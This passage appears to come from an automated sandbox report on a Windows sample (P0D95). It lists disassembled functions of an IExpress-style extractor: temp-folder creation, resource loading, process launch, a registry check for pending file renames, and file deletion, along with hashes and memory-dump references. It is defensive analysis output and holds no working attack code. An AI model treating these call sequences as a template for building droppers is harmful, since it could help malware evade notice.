                                                                                                                                                                                                                                                              • Part of subcall function 003E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5402
                                                                                                                                                                                                                                                              • Part of subcall function 003E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E541F
                                                                                                                                                                                                                                                              • Part of subcall function 003E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E542B
                                                                                                                                                                                                                                                              • Part of subcall function 003E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5434
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                            • API String ID: 1979080616-3696344869
                                                                                                                                                                                                                                                            • Opcode ID: 27ac9036613c419f8361d9b075e7bb1ae1b0109f66c05b2d2336c8f0d6d83b46
                                                                                                                                                                                                                                                            • Instruction ID: cc5586c8a62438b7ab4ff459cf883135d009677e55ba9aa40426871819222028
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27ac9036613c419f8361d9b075e7bb1ae1b0109f66c05b2d2336c8f0d6d83b46
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2631EA71B00AF45BCB239B279C456FE779EAB92348F15033AE407DA6D0DB708E418A91
                                                                                                                                                                                                                                                            Function 003E256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 586 3e256d-3e257d 587 3e2622-3e2627 call 3e24e0 586->587 588 3e2583-3e2589 586->588 592 3e2629-3e262f 587->592 589 3e258b 588->589 590 3e25e8-3e2607 RegOpenKeyExA 588->590 589->592 593 3e2591-3e2595 589->593 594 3e2609-3e2620 RegQueryInfoKeyA 590->594 595 3e25e3-3e25e6 590->595 593->592 597 3e259b-3e25ba RegOpenKeyExA 593->597 598 3e25d1-3e25dd RegCloseKey 594->598 595->592 597->595 599 3e25bc-3e25cb RegQueryValueExA 597->599 598->595 599->598
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,003E4096,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?), ref: 003E25B2
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?,003E4096), ref: 003E25CB
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,003E1ED3,00000001,00000000,?,?,003E4137,?,003E4096), ref: 003E25DD
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,003E4096,003E4096,?,003E1ED3,00000001,00000000,?,?,003E4137,?), ref: 003E25FF
                                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,003E4096,00000000,00000000,00000000,00000000,?,003E1ED3,00000001,00000000), ref: 003E261A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003E25F5
                                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 003E25C3
                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 003E25A8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                            • Opcode ID: 1e96aa83aff6d8a3f4c0664efa22f24b1dd72ef6c4a799c6c814ac62b5f50b68
                                                                                                                                                                                                                                                            • Instruction ID: 64566e931cc17646203b65a560553f1632f9bbe4d5715f4312668706de057de9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e96aa83aff6d8a3f4c0664efa22f24b1dd72ef6c4a799c6c814ac62b5f50b68
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18116D359022B8BBDB22DB939C49DFBBE6CEF017A1F114255F808A20C0D6705E44E6A1
                                                                                                                                                                                                                                                            Function 003E6A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 600 3e6a60-3e6a91 call 3e7155 call 3e7208 GetStartupInfoW 606 3e6a93-3e6aa2 600->606 607 3e6abc-3e6abe 606->607 608 3e6aa4-3e6aa6 606->608 611 3e6abf-3e6ac5 607->611 609 3e6aaf-3e6aba Sleep 608->609 610 3e6aa8-3e6aad 608->610 609->606 610->611 612 3e6ac7-3e6acf _amsg_exit 611->612 613 3e6ad1-3e6ad7 611->613 614 3e6b0b-3e6b11 612->614 615 3e6ad9-3e6af2 call 3e6c3f 613->615 616 3e6b05 613->616 617 3e6b2e-3e6b30 614->617 618 3e6b13-3e6b24 _initterm 614->618 615->614 625 3e6af4-3e6b00 615->625 616->614 620 3e6b3b-3e6b42 617->620 621 3e6b32-3e6b39 617->621 618->617 623 3e6b67-3e6b71 620->623 624 3e6b44-3e6b51 call 3e7060 620->624 621->620 627 3e6b74-3e6b79 623->627 624->623 633 3e6b53-3e6b65 624->633 628 3e6c39-3e6c3e call 3e724d 625->628 631 3e6b7b-3e6b7d 627->631 632 3e6bc5-3e6bc8 627->632 637 3e6b7f-3e6b81 631->637 638 3e6b94-3e6b98 631->638 634 3e6bca-3e6bd3 632->634 635 3e6bd6-3e6be3 _ismbblead 632->635 633->623 634->635 641 3e6be9-3e6bed 635->641 642 3e6be5-3e6be6 635->642 637->632 643 3e6b83-3e6b85 637->643 639 3e6b9a-3e6b9e 638->639 640 3e6ba0-3e6ba2 638->640 645 3e6ba3-3e6bbc call 3e2bfb 639->645 640->645 641->627 647 3e6c1e-3e6c25 641->647 642->641 643->638 644 3e6b87-3e6b8a 643->644 644->638 648 3e6b8c-3e6b92 644->648 645->647 653 3e6bbe-3e6bbf exit 645->653 650 3e6c27-3e6c2d _cexit 647->650 651 3e6c32 647->651 648->643 650->651 651->628 653->632
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003E7182
                                                                                                                                                                                                                                                              • Part of subcall function 003E7155: GetCurrentProcessId.KERNEL32 ref: 003E7191
                                                                                                                                                                                                                                                              • Part of subcall function 003E7155: GetCurrentThreadId.KERNEL32 ref: 003E719A
                                                                                                                                                                                                                                                              • Part of subcall function 003E7155: GetTickCount.KERNEL32 ref: 003E71A3
                                                                                                                                                                                                                                                              • Part of subcall function 003E7155: QueryPerformanceCounter.KERNEL32(?), ref: 003E71B8
                                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,003E72B8,00000058), ref: 003E6A7F
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 003E6AB4
                                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 003E6AC9
                                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 003E6B1D
                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 003E6B49
                                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 003E6BBF
                                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 003E6BDA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                                            • Opcode ID: b6d2d4955b1be6cf4b206a5c8f0b4b46cb00f86e4e98c89993e01c93432fe406
                                                                                                                                                                                                                                                            • Instruction ID: b471c59fa08cd6ff7ef50cd2eeefd9152f53b3f85ee46cd16ce43ef8f10bdbc2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6d2d4955b1be6cf4b206a5c8f0b4b46cb00f86e4e98c89993e01c93432fe406
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03410874D447F6CBDB339B6BDC867AA77A8AB54790F110329E945EB2D0CB704C418B41
                                                                                                                                                                                                                                                            Function 003E58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 654 3e58c8-3e58d5 655 3e58d8-3e58dd 654->655 655->655 656 3e58df-3e58f1 LocalAlloc 655->656 657 3e5919-3e5959 call 3e1680 call 3e658a CreateFileA LocalFree 656->657 658 3e58f3-3e5901 call 3e44b9 656->658 661 3e5906-3e5910 call 3e6285 657->661 668 3e595b-3e596c CloseHandle GetFileAttributesA 657->668 658->661 667 3e5912-3e5918 661->667 668->661 669 3e596e-3e5970 668->669 669->661 670 3e5972-3e597b 669->670 670->667
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E58E7
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5943
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E594D
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E595C
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5963
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                            • API String ID: 747627703-394614654
                                                                                                                                                                                                                                                            • Opcode ID: 5c7fb6f388d87800454495e3a4c7d7b4192d1c181c4bb0f7195678e94b26cd85
                                                                                                                                                                                                                                                            • Instruction ID: 62606e2afcc711f4245f0234e5f2d6df1c21b9cabedc10972a1c16d68c01a3d4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7fb6f388d87800454495e3a4c7d7b4192d1c181c4bb0f7195678e94b26cd85
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF11D0726006A0AAC7265B7BAC8DBDB7A9DDB86364F110715B50ADA2D2CB709C0586A0
                                                                                                                                                                                                                                                            Function 003E3FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 003E4033
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E4049
                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE(?,?), ref: 003E405C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003E409C
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 003E40A8
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003E40DC
                                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003E40E9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                                            • Opcode ID: 37c0de36cd4e4a3edb6c0a1ff75b93c90b04d4433ab29c8daddeb843ec27784e
                                                                                                                                                                                                                                                            • Instruction ID: 1b71f4be34f37f812fbe0dd9ff077eeffffb21ba8822b25aa71bbc9f47370ff0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c0de36cd4e4a3edb6c0a1ff75b93c90b04d4433ab29c8daddeb843ec27784e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA31A7316406A8ABEB329B66DC89FABB77CEB98710F100369F605D91E1C6305D85CB11
                                                                                                                                                                                                                                                            Function 003E51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F4D,?,00000002,00000000), ref: 003E5201
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003E5250
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                              • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                            • Opcode ID: 577ce6cc2f8978d95b8f46ed6f7fdea07b36465847c517115ebd64db1ffe84f3
                                                                                                                                                                                                                                                            • Instruction ID: 5dd507bbd4174838edf57d6a86e949ddbccfbb1f1f93f7312e1e950d575b7b8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 577ce6cc2f8978d95b8f46ed6f7fdea07b36465847c517115ebd64db1ffe84f3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8311E2B52006E1ABE3376B739C89B3B719DDB88394F114B29F702DE2D0DA799C005624
                                                                                                                                                                                                                                                            Function 003E3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F64,?,00000002,00000000), ref: 003E3A5D
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 003E3AB3
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                              • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 003E3AD0
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 003E3B13
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,003E3100,00000000,00000000), ref: 003E3AF4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                            • Opcode ID: af2ec4d43e4c716ebfb43ce774b9b9e9154421863f4b3cc5fb901132fd24433f
                                                                                                                                                                                                                                                            • Instruction ID: e316f2f44a77d860f4f272488d47078156643b0752f2ac52c25f207fd30dccc1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af2ec4d43e4c716ebfb43ce774b9b9e9154421863f4b3cc5fb901132fd24433f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 901190306002E1ABD733AB23AC4DF577AADDBD9750F10472EB546DE2E1DA7988009A60
                                                                                                                                                                                                                                                            Function 003E52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(02A34600,00000080,?,00000000), ref: 003E52F2
                                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(02A34600), ref: 003E52FA
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02A34600,?,00000000), ref: 003E5305
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02A34600), ref: 003E530C
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(003E11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 003E5363
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 003E5334
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
